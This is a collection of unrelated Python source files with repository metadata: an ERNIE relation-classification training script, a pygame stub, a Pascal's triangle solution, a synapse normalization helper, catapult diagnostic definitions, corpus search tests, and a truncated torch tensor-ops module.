from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import simplejson as json
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from knowledge_bert.tokenization import BertTokenizer
from knowledge_bert.modeling import BertForSequenceClassification
from knowledge_bert.optimization import BertAdam
from knowledge_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, input_ent, ent_mask, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.input_ent = input_ent
self.ent_mask = ent_mask
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_json(cls, input_file):
with open(input_file, "r", encoding='utf-8') as f:
return json.loads(f.read())
class FewrelProcessor(DataProcessor):
"""Processor for the CoLA data set (GLUE version)."""
def get_train_examples(self, data_dir):
"""See base class."""
examples = self._create_examples(
self._read_json(os.path.join(data_dir, "train.json")), "train")
labels = set([x.label for x in examples])
return examples, list(labels)
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "dev.json")), "dev")
def get_labels(self):
"""Useless"""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
guid = "%s-%s" % (set_type, i)
for x in line['ents']:
if x[1] == 1:
x[1] = 0
text_a = (line['text'], line['ents'])
label = line['label']
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
return examples
def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer, threshold):
"""Loads a data file into a list of `InputBatch`s."""
label_list = sorted(label_list)
label_map = {label : i for i, label in enumerate(label_list)}
entity2id = {}
with open("kg_embed/entity2id.txt") as fin:
fin.readline()
for line in fin:
qid, eid = line.strip().split('\t')
entity2id[qid] = int(eid)
features = []
for (ex_index, example) in enumerate(examples):
ex_text_a = example.text_a[0]
h, t = example.text_a[1]
h_name = ex_text_a[h[1]:h[2]]
t_name = ex_text_a[t[1]:t[2]]
if h[1] < t[1]:
ex_text_a = ex_text_a[:h[1]] + "# "+h_name+" #" + ex_text_a[h[2]:t[1]] + "$ "+t_name+" $" + ex_text_a[t[2]:]
else:
ex_text_a = ex_text_a[:t[1]] + "$ "+t_name+" $" + ex_text_a[t[2]:h[1]] + "# "+h_name+" #" + ex_text_a[h[2]:]
if h[1] < t[1]:
h[1] += 2
h[2] += 2
t[1] += 6
t[2] += 6
else:
h[1] += 6
h[2] += 6
t[1] += 2
t[2] += 2
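        # Offset bookkeeping, sketched: "# " adds 2 characters before the head
        # span and "$ " adds 2 before the tail span, while the closing " #"/" $"
        # markers add 2 more after each span. Whichever entity comes first is
        # therefore shifted by 2, and the later one by 2 + 4 = 6.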
tokens_a, entities_a = tokenizer.tokenize(ex_text_a, [h, t])
if len([x for x in entities_a if x!="UNK"]) != 2:
            print(entities_a, len([x for x in entities_a if x != "UNK"]))
exit(1)
tokens_b = None
if example.text_b:
tokens_b, entities_b = tokenizer.tokenize(example.text_b[0], [x for x in example.text_b[1] if x[-1]>threshold])
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
_truncate_seq_pair(tokens_a, tokens_b, entities_a, entities_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[:(max_seq_length - 2)]
entities_a = entities_a[:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
        # since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
        # used as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
ents = ["UNK"] + entities_a + ["UNK"]
segment_ids = [0] * len(tokens)
if tokens_b:
tokens += tokens_b + ["[SEP]"]
ents += entities_b + ["UNK"]
segment_ids += [1] * (len(tokens_b) + 1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
input_ent = []
ent_mask = []
for ent in ents:
if ent != "UNK" and ent in entity2id:
input_ent.append(entity2id[ent])
ent_mask.append(1)
else:
input_ent.append(-1)
ent_mask.append(0)
ent_mask[0] = 1
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
padding = [0] * (max_seq_length - len(input_ids))
padding_ = [-1] * (max_seq_length - len(input_ids))
input_ids += padding
input_mask += padding
segment_ids += padding
input_ent += padding_
ent_mask += padding
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(input_ent) == max_seq_length
assert len(ent_mask) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("ents: %s" % " ".join(
[str(x) for x in ents]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("label: %s (id = %d)" % (example.label, label_id))
features.append(
InputFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
input_ent=input_ent,
ent_mask=ent_mask,
label_id=label_id))
return features
def _truncate_seq_pair(tokens_a, tokens_b, ents_a, ents_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
ents_a.pop()
else:
tokens_b.pop()
ents_b.pop()
def accuracy(out, labels):
outputs = np.argmax(out, axis=1)
return np.sum(outputs == labels)
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0
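# Schedule sketch: with the default warmup=0.002 the multiplier ramps linearly
# during warmup and is flat afterwards, e.g. warmup_linear(0.001) == 0.5 and
# warmup_linear(0.01) == 1.0.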
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument("--data_dir",
default=None,
type=str,
required=True,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
parser.add_argument("--ernie_model", default=None, type=str, required=True,
help="Ernie pre-trained model")
parser.add_argument("--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.")
## Other parameters
parser.add_argument("--max_seq_length",
default=128,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
default=False,
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
default=False,
action='store_true',
help="Whether to run eval on the dev set.")
parser.add_argument("--do_lower_case",
default=False,
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size",
default=32,
type=int,
help="Total batch size for training.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--no_cuda",
default=False,
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument("--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
default=False,
action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument('--threshold', type=float, default=.3)
args = parser.parse_args()
processors = FewrelProcessor
num_labels_task = 80
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
else:
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
n_gpu = 1
# Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.distributed.init_process_group(backend='nccl')
logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
device, n_gpu, bool(args.local_rank != -1), args.fp16))
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if not args.do_train:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
processor = processors()
num_labels = num_labels_task
label_list = None
tokenizer = BertTokenizer.from_pretrained(args.ernie_model, do_lower_case=args.do_lower_case)
train_examples = None
num_train_steps = None
train_examples, label_list = processor.get_train_examples(args.data_dir)
num_train_steps = int(
len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)
# Prepare model
model, _ = BertForSequenceClassification.from_pretrained(args.ernie_model,
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank),
num_labels = num_labels)
if args.fp16:
model.half()
model.to(device)
if args.local_rank != -1:
try:
from apex.parallel import DistributedDataParallel as DDP
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
model = DDP(model)
elif n_gpu > 1:
model = torch.nn.DataParallel(model)
# Prepare optimizer
param_optimizer = list(model.named_parameters())
no_grad = ['bert.encoder.layer.11.output.dense_ent', 'bert.encoder.layer.11.output.LayerNorm_ent']
param_optimizer = [(n, p) for n, p in param_optimizer if not any(nd in n for nd in no_grad)]
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
t_total = num_train_steps
if args.local_rank != -1:
t_total = t_total // torch.distributed.get_world_size()
if args.fp16:
try:
from apex.optimizers import FP16_Optimizer
from apex.optimizers import FusedAdam
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
optimizer = FusedAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
bias_correction=False,
max_grad_norm=1.0)
if args.loss_scale == 0:
optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
else:
optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
else:
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total)
global_step = 0
if args.do_train:
train_features = convert_examples_to_features(
train_examples, label_list, args.max_seq_length, tokenizer, args.threshold)
vecs = []
vecs.append([0]*100)
with open("kg_embed/entity2vec.vec", 'r') as fin:
for line in fin:
vec = line.strip().split('\t')
vec = [float(x) for x in vec]
vecs.append(vec)
embed = torch.FloatTensor(vecs)
embed = torch.nn.Embedding.from_pretrained(embed)
#embed = torch.nn.Embedding(5041175, 100)
logger.info("Shape of entity embedding: "+str(embed.weight.size()))
del vecs
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_examples))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)
all_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)
all_ent = torch.tensor([f.input_ent for f in train_features], dtype=torch.long)
all_ent_masks = torch.tensor([f.ent_mask for f in train_features], dtype=torch.long)
train_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_ent, all_ent_masks, all_label_ids)
if args.local_rank == -1:
train_sampler = RandomSampler(train_data)
else:
train_sampler = DistributedSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
output_loss_file = os.path.join(args.output_dir, "loss")
loss_fout = open(output_loss_file, 'w')
model.train()
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
batch = tuple(t.to(device) if i != 3 else t for i, t in enumerate(batch))
input_ids, input_mask, segment_ids, input_ent, ent_mask, label_ids = batch
input_ent = embed(input_ent+1).to(device) # -1 -> 0
loss = model(input_ids, segment_ids, input_mask, input_ent.half(), ent_mask, label_ids)
if n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu.
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
optimizer.backward(loss)
else:
loss.backward()
loss_fout.write("{}\n".format(loss.item()))
tr_loss += loss.item()
nb_tr_examples += input_ids.size(0)
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * warmup_linear(global_step/t_total, args.warmup_proportion)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
model_to_save = model.module if hasattr(model, 'module') else model
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin_{}".format(global_step))
torch.save(model_to_save.state_dict(), output_model_file)
# Save a trained model
    model_to_save = model.module if hasattr(model, 'module') else model  # Only save the model itself
output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
torch.save(model_to_save.state_dict(), output_model_file)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
bfdfc1a62852507f68a014cbcc9ad012b1f7e16e | 9139bd5dad2c66f070d1eb01958a11a2af1c9835 | /game-again.py | 224f4ce078f24c31bd6fed0be854de5fba7b5cf7 | [] | no_license | anmolrajaroraa/python-reg-oct | 7223487b864d969e89f9daae2a77522405977f27 | acb62ad7c8acb78f348bdc47e5ed6230808d967c | refs/heads/master | 2020-08-04T09:10:25.152732 | 2019-11-08T08:57:28 | 2019-11-08T08:57:28 | 212,085,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | import pygame
pygame.init()
HEIGHT = 500
WIDTH = 1000
# red green blue (0-255)
BLACK = 0,0,0
WHITE = 255,255,255
RED = 255,0,0
RANDOM_COLOR = 100,150,200
gameboard = pygame.display.set_mode((WIDTH,HEIGHT))
while True:
print("!")
gameboard.fill( BLACK )
pygame.display.update( )
| [
"[email protected]"
] | |
20ede17c952b40d8bfe9406df93dd193f5dceb68 | b4ddc954a7dc0d24352de64a567c10c9e7231eee | /LeetCode/Pascal_Triangle.py | 19ffa5bc0886c62656dc9045ad7221ae44c9f5e0 | [] | no_license | sharadbhat/Competitive-Coding | 4d80c99093bf05a2213799c95467309cf3e40d07 | 79eec04cc6b1ac69295530bda1575ecb613a769e | refs/heads/master | 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # LeetCode
# https://leetcode.com/problems/pascals-triangle/description/
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0:
return []
l = [[1]]
for i in range(1, numRows):
k = [1]
for j in range(1, i):
k.append(l[i - 1][j - 1] + l[i - 1][j])
k.append(1)
l.append(k)
return l
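    # Example sketch: Solution().generate(5) returns
    # [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1]].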
| [
"[email protected]"
] | |
ba79f0a7a16eee2f5d086bd7d5e06adec8636825 | f10d45aecbfccb3f469ab0c4ae55fc0f256c9004 | /Functions/chr_ord.py | 80c8745e0e21329911e636eedb326846d34957cc | [] | no_license | Do-code-ing/Python_Built-ins | c34c1cea19a2cef80ab3a16d050e8825af0feb59 | 03b2f277acde4fce00bb521e3a0b8c0469b39879 | refs/heads/master | 2023-07-29T15:30:00.693005 | 2021-09-04T18:48:18 | 2021-09-04T18:48:18 | 354,467,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # chr(i) : character(int)
# Given a Unicode code point as an integer, returns the string for the character at that code point.
# Raises a ValueError if i is outside the range 0 to 1,114,111 (0x10FFFF in hexadecimal).
# Integer to character
print(chr(8364))
# '€'
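# Round-trip sketch: chr() and ord() invert each other for any valid code
# point, e.g. ord(chr(44032)) == 44032 (the Hangul syllable "가").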
# ord(c) : ordinal(character)
# Given a string representing a single Unicode character, returns the integer code point of that character.
# Works as the inverse of chr().
# Character to integer
print(ord("€"))
# 8364 | [
"[email protected]"
] | |
ea0d2d7415c8d98590a6caf8cc4bb1aa659fd24e | 1457bf059b94e04d4d512012b28a924167c68938 | /NetworkBehaviour/Basics/Normalization_Sparse.py | 164188463a9a59cb81bc31b3411633742dab0ba2 | [] | no_license | YaminaDJOUDI/PymoNNto | e063c81547d41a9841ff8f8071c4d6347ce792da | 807aa7e0ba38cb29ad7839b39f29752da00eee78 | refs/heads/master | 2023-07-08T03:06:41.722292 | 2021-08-04T11:30:52 | 2021-08-04T11:30:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | import numpy as np
scipy.sparse
def normalize_synapse_attr_sparse(src_attr, target_attr, target_value, neurons, synapse_type):
neurons.temp_weight_sum = neurons.get_neuron_vec()
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
s.dst.temp_weight_sum += np.array(getattr(s, src_attr).sum(1)).flatten()
else:
s.dst.temp_weight_sum += np.sum(getattr(s, src_attr), axis=1)
neurons.temp_weight_sum /= target_value
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
W = getattr(s, target_attr)
W.data /= np.array(neurons.temp_weight_sum[W.indices]).reshape(W.data.shape)
else:
setattr(s, target_attr, getattr(s, target_attr) / (s.dst.temp_weight_sum[:, None]+(s.dst.temp_weight_sum[:, None]==0)))
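
# Note (added): in the dense branch above, adding ``(sum == 0)`` to the
# denominator maps empty rows onto a harmless division by 1 instead of a
# division by 0. A standalone illustration of the same guard:
if __name__ == '__main__':
    sums = np.array([2.0, 0.0, 4.0])
    print(sums + (sums == 0))  # [2. 1. 4.] -- the zero entry divides by 1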
| [
"[email protected]"
] | |
e0af98a161bb2fe76f40a9dab414307691aed916 | cdecfcc56973ae143f04a9e92225c5fc90a052ab | /tracing/tracing/value/diagnostics/reserved_infos.py | 13aedf28520e992994fa0efa641eba6d7f919036 | [
"BSD-3-Clause"
] | permissive | eugenesavenko/catapult | 8e43adab9a4650da4e8e1860f3b9b49936955aae | f2ad70de40a8f739438d89b0c8d5ed6509b3cbe6 | refs/heads/master | 2021-05-05T17:31:51.483972 | 2017-09-13T15:10:56 | 2017-09-13T15:10:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,662 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class _Info(object):
def __init__(self, name, _type=None, entry_type=None):
self._name = name
self._type = _type
if entry_type is not None and self._type != 'GenericSet':
raise ValueError(
'entry_type should only be specified if _type is GenericSet')
self._entry_type = entry_type
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def entry_type(self):
return self._entry_type
ANGLE_REVISIONS = _Info('angleRevisions', 'GenericSet', str)
ARCHITECTURES = _Info('architectures', 'GenericSet', str)
BENCHMARKS = _Info('benchmarks', 'GenericSet', str)
BENCHMARK_START = _Info('benchmarkStart', 'DateRange')
BOTS = _Info('bots', 'GenericSet', str)
BUG_COMPONENTS = _Info('bugComponents', 'GenericSet', str)
BUILDS = _Info('builds', 'GenericSet', int)
CATAPULT_REVISIONS = _Info('catapultRevisions', 'GenericSet', str)
CHROMIUM_COMMIT_POSITIONS = _Info('chromiumCommitPositions', 'GenericSet', int)
CHROMIUM_REVISIONS = _Info('chromiumRevisions', 'GenericSet', str)
GPUS = _Info('gpus', 'GenericSet', str)
GROUPING_PATH = _Info('groupingPath')
LABELS = _Info('labels', 'GenericSet', str)
LOG_URLS = _Info('logUrls', 'GenericSet', str)
MASTERS = _Info('masters', 'GenericSet', str)
MEMORY_AMOUNTS = _Info('memoryAmounts', 'GenericSet', int)
MERGED_FROM = _Info('mergedFrom', 'RelatedHistogramMap')
MERGED_TO = _Info('mergedTo', 'RelatedHistogramMap')
OS_NAMES = _Info('osNames', 'GenericSet', str)
OS_VERSIONS = _Info('osVersions', 'GenericSet', str)
OWNERS = _Info('owners', 'GenericSet', str)
PRODUCT_VERSIONS = _Info('productVersions', 'GenericSet', str)
RELATED_NAMES = _Info('relatedNames', 'GenericSet', str)
SKIA_REVISIONS = _Info('skiaRevisions', 'GenericSet', str)
STORIES = _Info('stories', 'GenericSet', str)
STORYSET_REPEATS = _Info('storysetRepeats', 'GenericSet', int)
STORY_TAGS = _Info('storyTags', 'GenericSet', str)
TAG_MAP = _Info('tagmap', 'TagMap')
TRACE_START = _Info('traceStart', 'DateRange')
TRACE_URLS = _Info('traceUrls', 'GenericSet', str)
V8_COMMIT_POSITIONS = _Info('v8CommitPositions', 'DateRange')
V8_REVISIONS = _Info('v8Revisions', 'GenericSet', str)
WEBRTC_REVISIONS = _Info('webrtcRevisions', 'GenericSet', str)
def GetTypeForName(name):
for info in globals().itervalues():
if isinstance(info, _Info) and info.name == name:
return info.type
def AllInfos():
for info in globals().itervalues():
if isinstance(info, _Info):
yield info
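
if __name__ == '__main__':
  # Illustrative lookups (added); these rely only on the declarations above.
  assert GetTypeForName('bots') == 'GenericSet'
  assert GetTypeForName('traceStart') == 'DateRange'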
| [
"[email protected]"
] | |
286e5a84629ddfa8a87808ef1f9d99445655a7e5 | 7e79ca343d8d3246fc783161673550f6e4ae8896 | /tests/test_search.py | 73b1bddf6e9c87215ffb0554d6c68407a13132a2 | [
"MIT"
] | permissive | interrogator/buzz | 5ba0907115aa29efc24f016d1345a0371b91350a | 7627b8ce4a286f65388f0825487441df00055b39 | refs/heads/master | 2023-04-02T03:18:01.691139 | 2020-11-19T12:00:21 | 2020-11-19T12:00:21 | 163,623,092 | 42 | 2 | MIT | 2023-03-25T00:51:45 | 2018-12-30T22:55:18 | Python | UTF-8 | Python | false | false | 2,544 | py | import unittest
from buzz.corpus import Corpus
class TestSearch(unittest.TestCase):
@classmethod
def setUpClass(cls):
""" get_some_resource() is slow, to avoid calling it for each test use setUpClass()
and store the result as class variable
"""
super().setUpClass()
cls.parsed = Corpus("tests/testing-parsed")
cls.loaded = cls.parsed.load()
def test_non_loaded(self):
# todo: find out why .equals isn't the same.
res = self.parsed.depgrep("w/book/ = x/NOUN/")
lres = self.loaded.depgrep("w/book/ = x/NOUN/")
self.assertEqual(len(res), 3)
self.assertTrue(list(res._n) == list(lres._n))
res = self.parsed.depgrep("l/book/")
lres = self.loaded.depgrep("l/book/")
self.assertEqual(len(res), 6)
self.assertTrue(list(res.index) == list(lres.index))
self.assertTrue(list(res._n) == list(lres._n))
def test_bigrams(self):
j = self.loaded.just.words("(?i)jungle")
self.assertEqual(len(j), 6)
big = self.loaded.bigrams.depgrep("l/jungle/", from_reference=True).table(
show=["x"]
)
self.assertTrue("punct" in big.columns)
self.assertEqual(big.shape[1], 5)
no_punct = self.loaded.skip.wordclass.PUNCT
big = no_punct.bigrams.lemma("jungle", from_reference=False).table(show=["x"])
self.assertFalse("punct" in big.columns)
self.assertEqual(big.shape[1], 3)
def test_depgrep(self):
res = self.loaded.depgrep("L/book/")
self.assertEqual(len(res), 3)
res = self.loaded.depgrep('x/^NOUN/ -> l"the"', case_sensitive=False)
sup = self.loaded.depgrep('p/^N/ -> l"the"', case_sensitive=False)
# sup is a superset of res
self.assertTrue(all(i in sup.index for i in res.index))
self.assertEqual(len(sup), 28)
self.assertEqual(len(res), 24)
self.assertTrue((res.x == "NOUN").all())
# let us check this manually
# get all rows whose lemma is 'the'
the = self.loaded[self.loaded["l"] == "the"]
count = 0
# iterate over rows, get governor of the, lookup this row.
# if row is a noun, check that its index is in our results
for (f, s, _), series in the.T.items():
gov = series["g"]
gov = self.loaded.loc[f, s, gov]
if gov.x == "NOUN":
self.assertTrue(gov.name in res.index)
count += 1
self.assertEqual(count, len(res))
| [
"[email protected]"
] | |
de198265ca023fde36b1896bd7f7a3c4b83a552d | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /bigg/bigg/torch_ops/tensor_ops.py | 9f544ab7efd4d3e2c752d63f5d72056f16c23cef | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 3,956 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: skip-file
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.autograd import Function
import numpy as np
from bigg.common.consts import t_float
class MultiIndexSelectFunc(Function):
@staticmethod
def forward(ctx, idx_froms, idx_tos, *mats):
assert len(idx_tos) == len(idx_froms) == len(mats)
cols = mats[0].shape[1]
assert all([len(x.shape) == 2 for x in mats])
assert all([x.shape[1] == cols for x in mats])
num_rows = sum([len(x) for x in idx_tos])
out = mats[0].new(num_rows, cols)
for i, mat in enumerate(mats):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
out[x_to] = mat.detach()
else:
assert len(x_from) == len(x_to)
out[x_to] = mat[x_from].detach()
ctx.idx_froms = idx_froms
ctx.idx_tos = idx_tos
ctx.shapes = [x.shape for x in mats]
return out
@staticmethod
def backward(ctx, grad_output):
idx_froms, idx_tos = ctx.idx_froms, ctx.idx_tos
list_grad_mats = [None, None]
for i in range(len(idx_froms)):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
grad_mat = grad_output[x_to].detach()
else:
grad_mat = grad_output.new(ctx.shapes[i]).zero_()
grad_mat[x_from] = grad_output[x_to].detach()
list_grad_mats.append(grad_mat)
return tuple(list_grad_mats)
class MultiIndexSelect(Module):
def forward(self, idx_froms, idx_tos, *mats):
return MultiIndexSelectFunc.apply(idx_froms, idx_tos, *mats)
multi_index_select = MultiIndexSelect()
def test_multi_select():
a = Parameter(torch.randn(4, 2))
b = Parameter(torch.randn(3, 2))
d = Parameter(torch.randn(5, 2))
idx_froms = [[0, 1], [1, 2], [3, 4]]
idx_tos = [[4, 5], [0, 1], [2, 3]]
c = multi_index_select(idx_froms, idx_tos, a, b, d)
print('===a===')
print(a)
print('===b===')
print(b)
print('===d===')
print(d)
print('===c===')
print(c)
t = torch.sum(c)
t.backward()
print(a.grad)
print(b.grad)
print(d.grad)
class PosEncoding(Module):
